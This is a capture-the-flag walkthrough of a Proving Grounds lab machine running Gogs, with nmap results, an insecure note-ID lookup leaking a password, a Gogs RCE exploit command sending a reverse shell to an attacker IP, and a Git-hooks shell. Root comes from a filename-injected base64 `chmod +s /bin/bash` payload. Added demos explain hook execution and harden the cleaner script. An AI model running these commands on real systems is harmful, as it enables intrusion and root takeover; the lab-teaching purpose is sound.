WDavid404 / PG-Box

PG box walkthrough note

Assignment (easy) ★ #17

Open WDavid404 opened 4 months ago

WDavid404 commented 4 months ago

See the whole note instead of the key points

WDavid404 commented 4 months ago
```
PORT     STATE SERVICE  REASON         VERSION
22/tcp   open  ssh      syn-ack ttl 61 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http     syn-ack ttl 61
|_http-title: notes.pg
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
8000/tcp open  http-alt syn-ack ttl 61
|_http-title: Gogs
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-open-proxy: Proxy might be redirecting requests
```

http://192.168.203.224/login --> user info: jane@notes.pg NOTES.PG

http://192.168.203.224:8000/ --> Gogs

http://192.168.203.224:8000/explore/users --> jane

Search for a Gogs exploit --> https://github.com/Ressurect0/Gogs-RCE.git , but it requires an admin username/password.

Try to register a new user on the 8000/tcp Gogs page: test, test@notes.pg, password --> succeeded. --> didn't find useful info.

Register a new user (test) on the port 80 page --> on the /users page (image) --> credentials for "forged_owner":forged_owner.

Create a new note --> the URL for the new note is http://192.168.203.224/notes/11; change the id to 1, i.e. http://192.168.203.224/notes/1 --> got the password for jane (image).

Try using https://github.com/Ressurect0/Gogs-RCE.git: `python3 gogs.py -s 192.168.203.224:8000 -u jane -p 'svc-dev2022@@@!;P;4SSw0Rd' -t false -r 192.168.45.222:80` (ports other than 80/tcp may fail) --> (image)

Another way to get a foothold: refer to https://github.com/p0dalirius/CVE-2020-14144-GiTea-git-hooks-rce and edit all Git hooks to execute a reverse shell upon execution (image), then clone the repository and run an initial commit --> can get a shell (image).

PE:

`./pspy64 -i 1000` (image)

`$ cat /usr/bin/clean-tmp.sh` --->

```bash
#! /bin/bash
find /dev/shm -type f -exec sh -c 'rm {}' \;
```

Each time the find command is executed, every filename it finds is substituted for the curly brackets {} and then removed by rm (image).

`echo "">/dev/shm/'$(chmod +s /bin/bash)'` --> `ash: /dev/shm/$(chmod +s /bin/bash): No such file or directory`

`echo "chmod +s /bin/bash" | base64` --> `Y2htb2QgK3MgL2Jpbi9iYXNoCg==`

`echo "">/dev/shm/'$(echo Y2htb2QgK3MgL2Jpbi9iYXNoCg== | base64 -d | bash)'`

After a while (image)

It works. Then run `/bin/bash -p` (image).
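Why the Git-hooks route in the note gives code execution, as an added example that is not part of the note or of the linked p0dalirius repository: server-side hooks (pre-receive, update, post-receive) are executed by the git server, as the user the server runs as, whenever someone pushes. The block below stands a local bare repository in for Gogs, writes a post-receive hook the way the Gogs "Git Hooks" settings page would, and has the hook drop a marker file instead of launching a reverse shell. The temporary paths, the marker file and the demo commit identity are assumptions made for the demo.

```shell
#!/bin/sh
# Added example: a local bare repository stands in for Gogs. Writing a
# server-side hook is the same thing the note does through the Gogs UI;
# here the hook records which user it ran as instead of spawning a shell.

# Creates a bare "server" repo with a post-receive hook, clones it, pushes one
# commit, and prints the user the hook ran as (prints nothing if the hook did
# not run). The hook executes on the server side, with the server's
# privileges, which is why editable hooks are remote code execution.
hook_rce_demo() {
    base="$(mktemp -d)"            # assumed scratch location for the demo
    remote="$base/remote.git"      # stands in for the repository on Gogs
    work="$base/work"              # the attacker's clone
    marker="$base/hook-ran"        # written by the hook when it fires

    git init -q --bare "$remote"

    # What an attacker edits in the Gogs "Git Hooks" settings page. A real
    # payload would be a reverse shell; this one only records its identity.
    cat > "$remote/hooks/post-receive" <<EOF
#!/bin/sh
id -un > "$marker"
EOF
    chmod +x "$remote/hooks/post-receive"

    # The "clone, initial commit, push" sequence from the note.
    git clone -q "$remote" "$work" 2>/dev/null
    ( cd "$work" \
        && git -c user.name=demo -c user.email=demo@example.com \
               commit -q --allow-empty -m "initial commit" \
        && git push -q origin HEAD 2>/dev/null )

    [ -f "$marker" ] && cat "$marker"
    rm -rf "$base"
}

hook_rce_demo
```

On the real target the server user is whatever account runs Gogs (usually `git`), so the reverse shell in the note lands with that account's privileges; the push itself needs no special rights beyond what the edited repository already grants.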
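The injection in clean-tmp.sh next to a fixed version, as an added example that is not from the note: because find pastes each filename into the string handed to `sh -c`, sh parses the filename as shell code before rm runs, so a name containing `$(...)` executes. A filename cannot contain `/`, which is why the first attempt with `$(chmod +s /bin/bash)` failed with "No such file or directory" and the note switched to a base64-encoded payload; the demo payload below uses a slash-free `touch` instead. It runs over throwaway directories from mktemp rather than /dev/shm, and the cleaner function names and the `pwned` marker are assumptions for the demo.

```shell
#!/bin/sh
# Added example: reproduces the clean-tmp.sh command injection in scratch
# directories and contrasts it with a safe rewrite. Not from the original note.

# Vulnerable cleaner, same shape as /usr/bin/clean-tmp.sh but over the
# directory passed as $1: find substitutes each path into the command string,
# so sh -c parses the filename as code before rm ever runs.
vuln_clean() {
    find "$1" -type f -exec sh -c 'rm {}' \;
}

# Hardened cleaner: the path reaches sh as a positional argument ($1), not as
# shell source, so no part of it is interpreted. (`find ... -delete` or
# `-exec rm -- {} \;` would do just as well.)
safe_clean() {
    find "$1" -type f -exec sh -c 'rm -- "$1"' sh {} \;
}

# Runs one cleaner against a fresh directory holding a malicious filename.
# The payload avoids '/' (a filename cannot contain it), so `touch pwned`
# lands in the cleaner's working directory, which is a separate scratch dir.
# Prints "yes" if the injected command ran, "no" otherwise.
injection_fires() {
    cleaner="$1"
    cwd="$(mktemp -d)"    # where an injected `touch pwned` would land
    shm="$(mktemp -d)"    # stand-in for /dev/shm
    : > "$shm"/'$(touch pwned)'
    ( cd "$cwd" && "$cleaner" "$shm" 2>/dev/null ) || true
    if [ -e "$cwd/pwned" ]; then echo yes; else echo no; fi
    rm -rf "$cwd" "$shm"
}

echo "vulnerable cleaner, injection fired: $(injection_fires vuln_clean)"  # yes
echo "hardened cleaner,  injection fired:  $(injection_fires safe_clean)"  # no
```

The same check applies to any cron or pspy-discovered script that builds a command string from paths under a world-writable directory (`/dev/shm`, `/tmp`, upload folders): if `{}`, `$f` or a filename ends up inside quotes passed to `sh -c`, `eval` or `bash -c`, whoever can create files there controls what the script runs as root.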